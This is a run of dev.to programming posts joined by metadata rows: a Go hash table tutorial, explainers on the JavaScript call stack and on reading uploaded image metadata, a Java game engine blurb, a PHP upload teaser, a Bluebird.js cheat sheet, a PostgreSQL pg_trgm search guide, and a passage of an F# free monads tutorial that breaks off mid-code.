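	return sum % ArraySize
}

func main() {
	// anagrams contain the same runes, so their sums are equal
	fmt.Println(hash("ab") == hash("ba")) // true
}
```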
## Methods for HashTable
- insert method
```go
//insert will take a key and add it to hash table arr
func (h *HashTable) Insert(key string) {
index := hash(key)
h.array[index].insertInBucket(key)
}
```
- search method
```go
//search will take a key and return true if in hash table arr
func (h *HashTable) Search(key string) bool{
index := hash(key)
return h.array[index].searchInBucket(key)
}
```
- delete method
```go
//delete will take a key and delete the item from hash table arr
func (h *HashTable) Delete(key string) {
index := hash(key)
h.array[index].deleteFromBucket(key)
}
```
## Methods for Bucket(linkedlist)
- insertInBucket function
```go
func (b *bucket) insertInBucket(k string) {
	if !b.searchInBucket(k) {
		newNode := &bucketNode{key: k}
		newNode.next = b.head
		b.head = newNode
	} else {
		fmt.Println(k, "Already exists")
	}
}
```
- searchInBucket function
```go
func (b *bucket) searchInBucket(k string) bool {
	currentNode := b.head
	for currentNode != nil {
		if currentNode.key == k {
			return true
		}
		currentNode = currentNode.next
	}
	return false
}
```
- deleteFromBucket function
```go
func (b *bucket) deleteFromBucket(k string) {
	// guard: nothing to delete from an empty bucket
	if b.head == nil {
		return
	}
	if b.head.key == k {
		b.head = b.head.next
		return
	}
	previousNode := b.head
	for previousNode.next != nil {
		if previousNode.next.key == k {
			// unlink and return; without this return, deleting the last
			// node would leave previousNode nil and panic on the next check
			previousNode.next = previousNode.next.next
			return
		}
		previousNode = previousNode.next
	}
}
```
## Init function
```go
// Init function to initialize hashtable this will create a bucket in
// each slot of the hashtable
func Init() *HashTable{
result := &HashTable{}
for i := range result.array {
result.array[i] = &bucket{}
}
return result
}
```
## Main function
```go
func main() {
// myHashTable := &HashTable{} checking step
myHashTable := Init()
// fmt.Println(myHashTable)
// testBucket := &bucket{}
// testBucket.insertInBucket("sangha")
// fmt.Println(testBucket.searchInBucket("sangha"))
// testBucket.deleteFromBucket("messi")
// fmt.Println(testBucket.searchInBucket("sangha"))
list := []string{
"ERIC",
"JASH",
"JOSEPH",
"PRAVIN",
"WASER",
"MAYUR",
"QINGSHIN",
}
for _,v := range list{
myHashTable.Insert(v)
}
fmt.Println(myHashTable.Search("JOSEPH"))//true
fmt.Println(myHashTable.Search("MEGAN"))//false
}
```
### Lastly Full Code
Run it with: `go run main.go`
> // main.go is your filename
```go
package main
import "fmt"
const ArraySize = 7
// hash function
func hash(key string) int {
	sum := 0
	for _, v := range key {
		sum += int(v)
	}
	return sum % ArraySize
}
// Hashtable structure
type HashTable struct { // our hashtable will be an array
	array [ArraySize]*bucket
}
// bucket structure (linkedlist)
type bucket struct {
	head *bucketNode
}
// bucketNode structure
type bucketNode struct {
	key  string
	next *bucketNode
}
//insert will take a key and add it to hash table arr
func (h *HashTable) Insert(key string) {
index := hash(key)
h.array[index].insertInBucket(key)
}
//insertInBucket function
func (b *bucket) insertInBucket(k string) {
	if !b.searchInBucket(k) {
		newNode := &bucketNode{key: k}
		newNode.next = b.head
		b.head = newNode
	} else {
		fmt.Println(k, "Already exists")
	}
}
//search will take a key and return true if in hash table arr
func (h *HashTable) Search(key string) bool{
index := hash(key)
return h.array[index].searchInBucket(key)
}
// searchInBucket function
func (b *bucket) searchInBucket(k string) bool {
	currentNode := b.head
	for currentNode != nil {
		if currentNode.key == k {
			return true
		}
		currentNode = currentNode.next
	}
	return false
}
//delete will take a key and delete the item from hash table arr
func (h *HashTable) Delete(key string) {
index := hash(key)
h.array[index].deleteFromBucket(key)
}
// deleteFromBucket function
func (b *bucket) deleteFromBucket(k string) {
	// guard: nothing to delete from an empty bucket
	if b.head == nil {
		return
	}
	if b.head.key == k {
		b.head = b.head.next
		return
	}
	previousNode := b.head
	for previousNode.next != nil {
		if previousNode.next.key == k {
			// unlink and return; without this return, deleting the last
			// node would leave previousNode nil and panic on the next check
			previousNode.next = previousNode.next.next
			return
		}
		previousNode = previousNode.next
	}
}
// Init function to initialize hashtable this will create a bucket in
// each slot of the hashtable
func Init() *HashTable{
result := &HashTable{}
for i := range result.array {
result.array[i] = &bucket{}
}
return result
}
func main() {
// myHashTable := &HashTable{} checking step
myHashTable := Init()
fmt.Println(myHashTable)
testBucket := &bucket{}
testBucket.insertInBucket("sangha")
fmt.Println(testBucket.searchInBucket("sangha"))
testBucket.deleteFromBucket("sangha")
fmt.Println(testBucket.searchInBucket("sangha"))
list := []string{
"ERIC",
"JASH",
"JOSEPH",
"PRAVIN",
"WASER",
"MAYUR",
"QINGSHIN",
}
for _,v := range list{
myHashTable.Insert(v)
}
fmt.Println(myHashTable.Search("JOSEPH"))//true
fmt.Println(myHashTable.Search("MEGAN"))//false
}
``` | satishrajnale |
694,311 | How Does JS code run - Execution context and Call stack | Do you know how javascript code runs in the javascript engine? If not, then I hope this post will b... | 12,692 | 2021-05-11T02:46:24 | https://dev.to/prashan81992916/how-does-js-code-run-execution-context-and-call-stack-3a7 | javascript, codenewbie, executioncontext, webdev | Do you know how JavaScript code runs in the JavaScript engine?
If not, then I hope this post will be useful for understanding the execution context and how the order of execution contexts is maintained by the call stack. This fundamental concept also paves the way to comprehending hoisting, scopes, scope chains, and closures.
So lets start,
Before diving deep into the concept, we must have the basic understanding that ``JavaScript is synchronous and single threaded``:
1. Synchronous - control waits until a particular line of code is executed and only then moves to the next line.
2. Single threaded - there is only one call stack (explained below).
(i.e.) during the memory creation phase and the code execution phase of the execution context, JS code is executed line by line.
__Execution context__
``From here onwards I will be addressing execution context as EC``
Whenever we run JavaScript code, a global EC is created, which mainly comprises two phases:
1. Memory creation phase
2. Code execution or thread of execution phase
Let me explain this with a simple example,
```javascript
var a = 5;
function Square(a){
return a * a;
};
var total = Square(a);
```
As I mentioned before when we run this code, a global EC is created and the memory creation phase starts.


__1. Memory creation phase__
This phase is mainly about allocating memory for the variables and functions declared in the code. The JS engine looks for the variables and functions from the first line synchronously. It is important to note that during this phase:
1. For variables, the special value `undefined` is assigned by default.
2. For functions, the function code is copied as it is.
So in the above example, the variables ``a`` and ``total`` are initialized with ``undefined``, and for the ``Square`` function, the ``function code`` is copied as it is.
It's very important to understand this, because it makes it easy to see why variable hoisting happens in JS, which I will be covering in another post 😉.
__2. Code execution phase__
After completing the memory creation phase, the code gets executed right from the first line synchronously. So in the above example, the assignment ``a = 5`` replaces ``undefined`` for ``a`` in memory. When the control reaches the function invocation ``Square(a)``, a new EC is created within the global EC, and that new EC again goes through the same two phases. After its memory creation and code execution phases are over, the returned value is assigned to ``total`` in the memory part of the global EC, and the newly created EC is permanently deleted. If any more function invocations happen, a new EC is created each time. For nested functions, an EC is created within the parent EC.

But for deeply nested functions and other complex scenarios, it becomes really tough to manage the execution contexts, so here comes the ``call stack`` to our aid.
__Call Stack__
The call stack is responsible for managing the order of execution of ECs. When the JS code runs:
1. Initially: the global EC is pushed onto the stack.
2. After a function invocation: the newly created EC is pushed on top of the global EC.
3. When the function execution is over: its EC is popped off the stack.
4. When the entire program has been executed: the global EC is popped off the stack.
For nested functions: the child EC is pushed on top of the parent EC.
For an infinite loop: the call stack crashes, as it fills up with ECs until the maximum memory is reached.
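Here is a toy simulation of that push/pop bookkeeping (not the real engine, just an illustration of the ordering):

```javascript
const callStack = [];
const snapshots = [];

// invoke() plays the role of creating an EC: push on entry, pop on exit
function invoke(name, body) {
  callStack.push(name);                  // EC pushed when execution starts
  snapshots.push(callStack.join(' > ')); // record the stack at this moment
  body();
  callStack.pop();                       // EC popped when execution finishes
}

invoke('global', () =>
  invoke('outer', () =>
    invoke('inner', () => {})
  )
);

console.log(snapshots);
// [ 'global', 'global > outer', 'global > outer > inner' ]
```

Each entry in `snapshots` shows the stack right after a new EC is pushed; by the end, every EC has been popped off again.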
I hope this was insightful! Let me know in the comments.
Don't forget to follow me!!! I will be explaining hoisting, scope, and closures in the upcoming posts using the concepts you learned here (execution context).
| prashan81992916 |
694,966 | How to gets uploaded image Metadata on the front-end | Quite often when we implement uploading images, will be great to have the opportunity somehow to get... | 0 | 2021-06-04T15:05:21 | https://dev.to/detoner777/how-to-gets-uploaded-image-metadata-on-the-front-end-2h1k | react, metadata, filereader, javascript | Quite often when we implement image uploading, it is great to have a way to get the image metadata (width, height, fileSize, name, ...) directly on the front-end.
An example of the input used to upload an image file:
```javascript
<input type="file" name="myImage" accept="image/png, image/gif, image/jpeg" onChange={ (e) => handleChange(e.target.files) } />
```
To get the name, file size, and extension of the uploaded file:
```javascript
const file = e.target.files[0]
const { name } = file
const fileExtension = name.split('.').pop()
const fileSize = file.size
```
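One caveat worth knowing: `name.split('.').pop()` returns the whole file name when there is no dot in it at all. A hypothetical guard (the helper name and file names are just examples):

```javascript
// Returns the extension, or '' when the file name contains no dot.
const getExtension = (name) => (name.includes('.') ? name.split('.').pop() : '');

console.log(getExtension('photo.final.png')); // 'png' (last segment wins)
console.log(getExtension('README'));          // '' (no extension)
```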
In case you need a local URL that can be used to render the uploaded image:
```javascript
const localUrl = URL.createObjectURL(file)
```
To get the width and height of the uploaded image, use a `new FileReader()` together with the `image.decode()` method:
```javascript
var reader = new FileReader()
reader.onload = async (e: any) => {
let image = new Image()
image.src = e.target.result
await image.decode()
// now we can:
const width = image.width
const height = image.height
}
reader.readAsDataURL(file)
```
This is async logic, so a better way to use it in a project is to wrap it in a `new Promise`. I use an async function wrapper to get all the needed metadata:
```typescript
// Function takes single uploaded img file, and returns width, height, fileSize and fileExtension
export const getImageMeta = async (
file: File
): Promise<{
width: number,
height: number,
fileSize: number,
fileExtension: string,
localUrl: string,
}> => {
const { name } = file
const fileExtension = name.split('.').pop()
const localUrl = URL.createObjectURL(file)
// reading a file to get height and width
async function getImageParams(file: File) {
return new Promise<{ width: number, height: number }>((resolve) => {
var reader = new FileReader()
reader.onload = async (e: any) => {
var image = new Image()
image.src = e.target.result
await image.decode()
resolve({ width: image.width, height: image.height })
}
reader.readAsDataURL(file)
})
}
const { width, height } = await getImageParams(file)
return { width, height, fileSize: file.size, fileExtension, localUrl }
}
``` | detoner777 |
694,970 | MovingPoint-Lightweight-Java-2D-Game-Engine | Find repo here: https://github.com/MarcoSteinke/MovingPoint-Lightweight-Java-2D-Game-Engine 1 Beginn... | 0 | 2021-05-11T14:02:39 | https://dev.to/marcosteinke/movingpoint-lightweight-java-2d-game-engine-2m7l | Find repo here: https://github.com/MarcoSteinke/MovingPoint-Lightweight-Java-2D-Game-Engine
1 Beginner Friendly / Educational
+ I love programming and I also love teaching it to others, so the main goal of MovingPoint is to bring new motivated talent into programming.
+ A lot of people dream of creating their own games; MovingPoint gives them a first impression of game design.
+ Even children with basic Java skills could use this to create simple games like TicTacToe or Snake!
2 Operating System Independence
+ Since MovingPoint is written in pure Java, you can run it on any operating system.
3 Hardware Independence
+ MovingPoint is lightweight; you do not need the latest hardware to build your games.
+ You also do not need to import all modules, only the code which you need for your project.
4 Use all Java libraries!
+ Yes, it is true. You can use any libraries and connect them to MovingPoint.
+ You are able to create browser games by running a Java web application and importing MovingPoint.
+ It is also usable for creating Android apps by using Android Studio!
5 Open source
+ Since I have been coding for around 5 years and have tried out many different things, this is my first try at writing a game engine, so I want everybody to help me with the development.
+ You are able to use the engine as you want to. Modify it, give me tips, and together we can create a new experience of Game Design. | marcosteinke | |
694,990 | PHP 8 Multiple Files/Images Upload in MySQL Database Example Tutorial
| Hi Guys, In this tutorial,I will learn you how to multiple image and file upload in mysql database u... | 0 | 2021-05-11T14:52:44 | https://dev.to/sonagrabhavesh/php-8-multiple-files-images-upload-in-mysql-database-example-tutorial-3e9d | php, laravel, mysql, programming | <p>Hi Guys,</p>
<p>In this tutorial, I will show you how to upload multiple images and files into a MySQL database using PHP 8. It is quick and simple.</p>
<p>File upload is one of the most common features that almost every PHP developer has to build. As we know, file uploading functionality is required in nearly every web application. In this tutorial, we will learn how to upload single or multiple files or images in PHP 8 and how to save the images in a MySQL database.</p>
<p>When it comes to uploading multiple images or files, we need to think through some logic and work out the process. Sometimes you have a requirement to upload multiple images at once.</p>
<p>In this tutorial, we will implement all these processes, step by step.</p>
<ul>
<li>Create a database table.</li>
<li>Create an image/file uploading form.</li>
<li>The database connection file.</li>
<li>The image upload logic script file.</li>
<li>Complete Code</li>
</ul>
If you want to see the full example, follow the link below:
https://codingtracker.blogspot.com/2021/05/php-8-multiple-filesimages-upload-in.html | sonagrabhavesh |
695,080 | Simple Bluebird.Js Cheat Sheet | Reference Official documentation Bluebird.Js Cheat Sheet Generators User.... | 0 | 2021-05-11T16:28:07 | https://dev.to/hoanganhlam/simple-bluebird-js-cheat-sheet-8k4 | cheatsheet, bluebird | ### Reference
* [Official documentation](http://bluebirdjs.com/docs/api-reference.html)
* [Bluebird.Js Cheat Sheet](https://cheatsheetmaker.com/bluebirdjs)
### Generators
```
User.login = Promise.coroutine(function* (email, password) {
let user = yield User.find({email: email}).fetch()
return user
})
```
See [Promise.coroutine](http://bluebirdjs.com/docs/api/promise.coroutine.html).
### Promise-returning methods
```
User.login = Promise.method((email, password) => {
if (!valid)
throw new Error("Email not valid")
return /* promise */
})
```
See [Promise.method](http://bluebirdjs.com/docs/api/promise.method.html).
### Node-style functions
```
var readFile = Promise.promisify(fs.readFile)
var fs = Promise.promisifyAll(require('fs'))
```
See [Promisification](http://bluebirdjs.com/docs/api/promisification.html).
### Chain of promises
```
function getPhotos() {
return Promise.try(() => {
if (err) throw new Error("boo")
return result
})
}
getPhotos().then(···)
```
Use [Promise.try](http://bluebirdjs.com/docs/api/promise.try.html).
### Object
```
Promise.props({
photos: get('photos'),
posts: get('posts')
})
.then(res => {
res.photos
res.posts
})
```
Use [Promise.props](http://bluebirdjs.com/docs/api/promise.props.html).
### Multiple promises (array)
* [Promise.all](http://bluebirdjs.com/docs/api/promise.all.html)(\[p\]) - expect all to pass
* [Promise.some](http://bluebirdjs.com/docs/api/promise.some.html)(\[p\], count) - expect `count` to pass
* [Promise.any](http://bluebirdjs.com/docs/api/promise.any.html)(\[p\]) - same as `some([p], 1)`
* [Promise.race](http://bluebirdjs.com/docs/api/promise.race.html)(\[p\]) - use `.any` instead
* [Promise.map](http://bluebirdjs.com/docs/api/promise.map.html)(\[p\], fn, options) - supports concurrency
```
Promise.all([ promise1, promise2 ])
.then(results => {
results[0]
results[1]
})
// succeeds if one succeeds first
Promise.any(promises)
.then(results => {
})
```
```
Promise.map(urls, url => fetch(url))
.then(···)
```
Use [Promise.map](http://bluebirdjs.com/docs/api/promise.map.html) to "promisify" a list of values.
### Multiple promises
```
Promise.join(
getPictures(),
getMessages(),
getTweets(),
function (pics, msgs, tweets) {
return ···
}
)
```
Use [Promise.join](http://bluebirdjs.com/docs/api/promise.join.html)
### Multiple return values
```
.then(function () { return [ 'abc', 'def' ] })
.spread(function (abc, def) { ··· })
```
Use [Promise.spread](http://bluebirdjs.com/docs/api/promise.spread.html)
### Example
```js
promise
.then(okFn, errFn)
.spread(okFn, errFn) // *
.catch(errFn)
.catch(TypeError, errFn) // *
.finally(fn)
.map(function (e) { ··· }) // *
.each(function (e) { ··· }) // *
```
Those marked with `*` are non-standard Promise APIs that only work with Bluebird promises.
| hoanganhlam |
695,261 | String similarity search and fast LIKE operator using pg_trgm | SQL supports wildcard search on strings using LIKE operator which accepts % and _ wildcards. The prob... | 0 | 2021-05-11T20:58:37 | https://mazeez.dev/posts/pg-trgm-similarity-search-and-fast-like | postgres, pgtrgm, search |
SQL supports wildcard search on strings using the `LIKE` operator, which accepts the `%` and `_` wildcards. The problem with `LIKE` is that it's not very fast if you have a lot of rows and the query is [non-sargable](https://en.wikipedia.org/wiki/Sargable). And in some cases you need to provide fuzzy search capabilities, where the results don't have to exactly match the query.
PostgreSQL has the [`pg_trgm` extension](https://www.postgresql.org/docs/9.6/pgtrgm.html) that solves both problems:
- It has `gin` and `gist` indexes for speeding up `LIKE` and other string operators
- It has `similarity` function and `%` operator for string similarity search using trigrams.
Let's assume we have this table:
```sql
CREATE TABLE persons (
id int4 NOT NULL GENERATED ALWAYS AS IDENTITY,
forenames varchar(100) NOT NULL,
surname varchar(100) NOT NULL,
forenames_normalized varchar(100) NOT NULL,
surname_normalized varchar(100) NOT NULL,
CONSTRAINT persons_pk PRIMARY KEY (id)
);
```
**Note:** Normalized columns are lowercase versions of the normal columns with special characters removed. You can also remove character accents. This makes the search experience better for the user, as they don't have to type the exact case and punctuation.
I inserted 10M rows of fake data generated by [Bogus](https://github.com/bchavez/Bogus) into the table. You can [download the dump here](http://github.com/mhmd-azeez/PgTrgm).
If we run a `LIKE` query on it:
```sql
select * from persons p
where surname_normalized like '%tche%' and forenames_normalized like '%nde%'
```
On my laptop it takes PostgreSQL about a second to return the results:
```sql
Gather (cost=1000.00..142174.75 rows=10 width=30) (actual time=9.719..639.460 rows=75 loops=1)
Workers Planned: 2
Workers Launched: 2
-> Parallel Seq Scan on persons p (cost=0.00..141173.75 rows=4 width=30) (actual time=3.425..605.240 rows=25 loops=3)
Filter: (((surname_normalized)::text ~~ '%tche%'::text) AND ((forenames_normalized)::text ~~ '%nde%'::text))
Rows Removed by Filter: 3333308
Planning Time: 0.097 ms
Execution Time: 639.494 ms
```
It seems like all of the rows in the table are scanned sequentially. To speed things up, first we need to enable the `pg_trgm` extension on the database:
```sql
create extension if not exists pg_trgm;
```
Then we can use the `gin` index on the normalized columns:
```sql
create index if not exists idx_gin_persons_on_names on persons using gin (forenames_normalized gin_trgm_ops, surname_normalized gin_trgm_ops)
```
**Note:** `gin` index and `gin_trgm_ops` operator are part of `pg_trgm`.
Adding the `gin` index took about a minute on my laptop for 10M rows.
Now let's see if the results have improved:
```sql
Bitmap Heap Scan on persons p (cost=54.20..3692.46 rows=995 width=30) (actual time=4.011..4.066 rows=75 loops=1)
Recheck Cond: (((forenames_normalized)::text ~~ '%nde%'::text) AND ((surname_normalized)::text ~~ '%tche%'::text))
Heap Blocks: exact=75
-> Bitmap Index Scan on idx_gin_persons_on_names (cost=0.00..53.95 rows=995 width=0) (actual time=3.999..3.999 rows=75 loops=1)
Index Cond: (((forenames_normalized)::text ~~ '%nde%'::text) AND ((surname_normalized)::text ~~ '%tche%'::text))
Planning Time: 0.092 ms
Execution Time: 4.120 ms
```
Instead of `639.494 ms` for execution time, now it only takes `4.1 ms`! That's because instead of sequentially scanning all of the rows in the table, PostgreSQL scanned the `gin` index.
Great, now let's take a look at how to do fuzzy search:
Let's say we are trying to find someone with forename(s) of `anderson` and surname of `mitchell`:
```sql
select id, forenames, surname, ((similarity('mitchel', surname_normalized) + similarity('andersen', forenames_normalized)) / 2) as score from persons p
order by score desc
limit 10
```
This query takes about 58 seconds to complete. The `similarity` function is expensive, so we should avoid computing it for as many rows as possible. For that, we can use the similarity operator (`%`) to filter out the rows that fall below a certain threshold. By default the threshold is 30% similarity (`0.3`), but you can change that using `set_limit`. Now let's use it:
```sql
select id, forenames, surname, ((similarity('mitchel', surname_normalized) + similarity('andersen', forenames_normalized)) / 2) as score from persons p
where forenames_normalized % 'andersen' and surname_normalized % 'mitchel'
order by score desc
limit 10
```
Now it takes about `100ms` on my laptop. A huge improvement over 58 seconds :)
## Edge Cases
`pg_trgm` uses trigrams for indexing: each string is broken into all possible 3-letter sequences. Simplifying a bit, `mitchel`'s trigrams are `mit`, `itc`, `tch`, `che`, `hel`, and `michelle`'s trigrams are `mic`, `ich`, `che`, `hel`, `ell`, `lle`. They share 2 trigrams, and the similarity score is the ratio of shared trigrams to total distinct trigrams. (In reality `pg_trgm` also pads each word with spaces before extracting trigrams, which is how the similarity of `mitchel` and `michelle` works out to roughly 30%.)
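For intuition, here is a rough Python sketch of this simplified (unpadded) trigram similarity; note that the real `pg_trgm` pads words with spaces before extracting trigrams, so its numbers come out slightly different:

```python
def trigrams(word):
    """All 3-letter substrings of the word (no space padding)."""
    return {word[i:i + 3] for i in range(len(word) - 2)}

def similarity(a, b):
    """Shared trigrams divided by total distinct trigrams."""
    ta, tb = trigrams(a), trigrams(b)
    return len(ta & tb) / len(ta | tb)

print(trigrams("mitchel") & trigrams("michelle"))   # the shared pair: 'che' and 'hel'
print(round(similarity("mitchel", "michelle"), 2))  # 0.22 without padding
```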
This approach is not useful for search terms shorter than three letters, because you can't form any trigrams from them. So this query:
```sql
select * from persons p
where surname_normalized like '%he%' and forenames_normalized like '%de%'
```
Takes the same amount of time on both the indexed and the non-indexed table, because PostgreSQL does a sequential scan in both cases:
```
Gather (cost=1000.00..147095.90 rows=49229 width=30) (actual time=1.169..655.329 rows=21216 loops=1)
Workers Planned: 2
Workers Launched: 2
-> Parallel Seq Scan on persons p (cost=0.00..141173.00 rows=20512 width=30) (actual time=0.397..583.521 rows=7072 loops=3)
Filter: (((surname_normalized)::text ~~ '%he%'::text) AND ((forenames_normalized)::text ~~ '%de%'::text))
Rows Removed by Filter: 3326261
Planning Time: 0.105 ms
Execution Time: 655.974 ms
```
There can be cases where the index makes things slower, so please test it for your own use case and weigh the trade-offs. Also keep in mind that [inserts and updates take longer with the index](https://iamsafts.com/posts/postgres-gin-performance/).
## Benchmarks
I wrote some very simple benchmarks using [BenchmarkDotNet](https://github.com/dotnet/BenchmarkDotNet) and here are the results:
```
// * Summary *
BenchmarkDotNet=v0.12.1, OS=Windows 10.0.19041.928 (2004/?/20H1)
Intel Core i7-8550U CPU 1.80GHz (Kaby Lake R), 1 CPU, 8 logical and 4 physical cores
.NET Core SDK=5.0.201
[Host] : .NET Core 5.0.4 (CoreCLR 5.0.421.11614, CoreFX 5.0.421.11614), X64 RyuJIT
DefaultJob : .NET Core 5.0.4 (CoreCLR 5.0.421.11614, CoreFX 5.0.421.11614), X64 RyuJIT
| Method | Mean | Error | StdDev | Median |
|---------------------:|-------------:|-----------:|-----------:|-----------:|
| LikeOnGinIndex | 5.398 ms | 0.7167 ms | 2.113 ms | 4.170 ms |
| Like | 1,035.140 ms | 55.0098 ms | 158.716 ms | 991.495 ms |
| SimilarityOnGinIndex | 137.339 ms | 14.7610 ms | 43.523 ms | 114.342 ms |
```
**Note**: Please download the database dump and code on [GitHub](http://github.com/mhmd-azeez/PgTrgm). | mhmd_azeez |
695,269 | Grokking Free Monads | In this post I’m going to try and demystify free monads and show you that they’re not some strange ab... | 12,008 | 2021-05-14T19:33:19 | https://dev.to/choc13/grokking-free-monads-9jd | fsharp, functional, programming, grokking | In this post I’m going to try and demystify free monads and show you that they’re not some strange abstract creature, but in fact can be very useful for solving certain problems. Rather than focusing on the theory, our aim here will be to get a solid intuition about free monads, you'll then find learning the theory much easier. So in keeping with the rest of this series we’ll discover the free monad ourselves by solving a real software problem.
# Pre-requisites
I try to keep these posts as independent from each other as possible, but in this case there's not much getting around the fact that you're probably going to need to have already grokked monads. If you haven't yet done so, then have a browse through [Grokking Monads](https://dev.to/choc13/grokking-monads-in-f-3j7f) and once you're done you'll be all set to continue here.
# The Scenario
Let's say we work at an e-commerce store and we need to implement a `chargeUser` function. This function should take a `UserId` and an `amount`. It should look up the user's profile to get hold of their credit card, then it should charge the user's card the specified amount. If the user has an email address it should send them a receipt.
```fsharp
type EmailAddress = EmailAddress of string
type Email =
{ To: EmailAddress
Body: string }
type CreditCard =
{ Number: string
Expiry: string
Cvv: string }
type TransactionId = TransactionId of string
type UserId = UserId of string
type User =
{ Id: UserId
CreditCard: CreditCard
EmailAddress: EmailAddress option }
let chargeUser (amount: float) (userId: UserId): TransactionId =
// TODO: Implement this as part of the domain model
```
Our main aim in this post is to be able to write the `chargeUser` function in our domain model. By domain model, we're referring to the very thing we're writing our program for in the first place. In this case as we're an e-commerce store that means our domain model includes things like user profiles, products and orders.
Typically when we write our application we want to keep our domain model completely decoupled from any infrastructure or application layer code, because those things are the incidental complexity that we have to solve. Our domain model should be pure and abstract in the sense that if we were to use a different database or a different cloud provider, the domain model should be unaffected.
It's easy to write types in our domain layer to represent the objects in the model without introducing any unwanted coupling, but what about the functions like `chargeUser`? On the one hand we know it's going to need to call external services, so does that mean we should define it outside of the domain model where we have access to the database etc? On the other hand it's not uncommon to want to take decisions in functions like this, such as whether or not we should email the user a receipt, and that logic definitely feels like domain logic that we'd want to test independent of the database.
# Functions as data
There are several ways to make domain operations pure and agnostic to any infrastructure concerns. We've touched on one before in [Grokking the Reader Monad](https://dev.to/choc13/grokking-monads-in-f-3j7f). One interesting way to do it though is to treat functions as if they were data.
What do we mean by functions as data? The best way to understand this is to see some code. Let's take the `chargeUser` function and write a data model to describe the operations it needs to perform.
```fsharp
type ChargeUserOperations =
| LookupUser of (UserId -> User)
| ChargeCreditCard of (float -> CreditCard -> TransactionId)
| EmailReceipt of (Email -> unit)
```
We've created a type called `ChargeUserOperations` that has a case for each of the operations we want to perform as part of `chargeUser`. Each case is parameterised by the function signature that we want it to have. So instead of being functions that we call, we've just got some abstract data representing the functions that we want to invoke and we'd like to use it like so.
```fsharp
let chargeUser amount userId: TransactionId =
let user = LookupUser userId
let transactionId = ChargeCreditCard amount user.CreditCard
match user.EmailAddress with
| Some emailAddress ->
let email =
{ To = emailAddress
Body = $"TransactionId {transactionId}" }
EmailReceipt email
return transactionId
| None -> return transactionId
```
Obviously, this isn't going to work. We can't simply write `LookupUser userId` and assign that to something of type `User`. For starters `LookupUser` is expecting a function as an argument, not a `UserId`. This idea of functions as data is an interesting one though, so let's see if we can find a way to make it work.
It doesn't really make sense to try and extract a return value from data. All we can really do with data is create it. So what about if we instead created each operation with another operation nested inside it, kind of like a callback that would take the output of the current computation and produce a new output. Something like this.
```fsharp
type ChargeUserOperation =
| LookupUser of (UserId * (User -> ChargeUserOperation))
| ChargeCreditCard of (float * CreditCard * (TransactionId -> ChargeUserOperation))
| EmailReceipt of (Email * (unit -> ChargeUserOperation))
```
We've made a couple of changes here. Firstly, each operation is now parameterised by a tuple instead of a function. We can think of the tuple as the list of arguments to the function. Secondly, the final argument in the tuple is our callback. When you create an operation, you tell it which operation you'd like to perform next with the result of this one. Let's give this new format a try.
```fsharp
let chargeUser (amount: float) (userId: UserId): TransactionId =
LookupUser(
userId,
(fun user ->
ChargeCreditCard(
amount, user.CreditCard,
(fun transactionId ->
match user.EmailAddress with
| Some emailAddress ->
EmailReceipt(
{ To = emailAddress
Body = $"TransactionId {transactionId}" },
(fun _ -> // Hmmm, how do we get out of this?)
)
| None -> // Hmmm, how do we get out of this?)
))
)
```
Ok, it's getting better. We can see that this data structure is capturing the abstract logic of what the `chargeUser` function needs to do, without actually depending on any particular implementation. The only snag is we don't have a way to return a value at the end. Each of our operations has been defined such that it needs to be passed another callback, so how do we signal that we should actually just return a value?
What we need is a case in `ChargeUserOperation` that doesn't require a callback, one that just "returns" a value. Let's call it `Return`. We also need to make `ChargeUserOperation` generic on the return type to encapsulate the fact that each operation returns some value, but that the values returned by each operation might differ.
```fsharp
type ChargeUserOperation<'next> =
| LookupUser of (UserId * (User -> ChargeUserOperation<'next>))
| ChargeCreditCard of (float * CreditCard * (TransactionId -> ChargeUserOperation<'next>))
| EmailReceipt of (Email * (unit -> ChargeUserOperation<'next>))
| Return of 'next
```
We've chosen the name `'next` for the generic parameter to signify the fact that it's the value returned by the "next" computation in the chain. In the case of `Return` then it's just immediately "returned". We're now finally in a position to write `chargeUser`.
```fsharp
let chargeUser (amount: float) (userId: UserId): ChargeUserOperation<TransactionId> =
LookupUser(
userId,
(fun user ->
ChargeCreditCard(
amount, user.CreditCard,
(fun transactionId ->
match user.EmailAddress with
| Some emailAddress ->
EmailReceipt(
{ To = emailAddress
Body = $"TransactionId {transactionId}" },
(fun _ -> Return transactionId)
)
| None -> Return transactionId)
))
)
```
That's it! We've captured the logic of `chargeUser` in a completely abstract data structure. We know that it's got no dependence on any infrastructure because we fabricated it purely out of data types. We've taken our domain modelling to the next level, by modelling its computations as data too! ✅
One thing to note is that `chargeUser` now returns `ChargeUserOperation<TransactionId>`. This might seem weird, but we can think of it this way: `chargeUser` is now a function that produces a data structure representing the domain operation of charging a user and returning the `TransactionId`.
If you've grokked it this far, then you've made the fundamental mental leap; the fact that we're just representing a computation as data. The rest of this post is just going to be dedicated to cleaning this up to make it easier to read and write `chargeUser`. Things might get a bit abstract, but just keep in mind the fact that all we're doing is trying to build this data structure to represent our computation.
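For readers coming from other languages, the same "computation as data" idea can be sketched in a few lines of Python. The names and shapes here are hypothetical, chosen only to mirror the F# above:

```python
from dataclasses import dataclass
from typing import Any, Callable

# Each operation is plain data carrying its inputs plus a "next" callback
# that receives the operation's result and returns the following step.
@dataclass
class LookupUser:
    user_id: str
    next: Callable[[dict], Any]

@dataclass
class ChargeCreditCard:
    amount: float
    card: str
    next: Callable[[str], Any]

@dataclass
class Return:
    value: Any

def charge_user(amount: float, user_id: str) -> Any:
    # Nothing executes here -- we only build a description of the workflow.
    return LookupUser(user_id, lambda user:
        ChargeCreditCard(amount, user["card"], lambda tx_id:
            Return(tx_id)))

# Walking the structure by hand with fake values shows it really is just data:
step1 = charge_user(9.99, "u1")
step2 = step1.next({"card": "4111"})   # pretend the lookup returned this user
step3 = step2.next("tx-123")           # pretend the charge returned this id
print(type(step1).__name__, type(step2).__name__, step3.value)
```

Nothing talks to a database or payment gateway; whoever receives this structure decides how each step actually runs.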
# Flattening the pyramid ⏪
One problem with `chargeUser` in its current form is that we're back in nested callback hell (a.k.a. the [Pyramid of Doom](https://en.wikipedia.org/wiki/Pyramid_of_doom_(programming))). We already know that monads are useful for flattening nested computations, so let's see if we can make `ChargeUserOperation` a monad.
The recipe for making something a monad is to implement `bind` for that type. We start by writing down the function signature and use that to guide us. In this case the signature is:
```fsharp
('a -> ChargeUserOperation<'b>) -> ChargeUserOperation<'a> -> ChargeUserOperation<'b>
```
So we're going to have to unwrap the `ChargeUserOperation` to get at the value `'a` and then apply it to the function we've been passed to generate a `ChargeUserOperation<'b>`. Let's get stuck in.
```fsharp
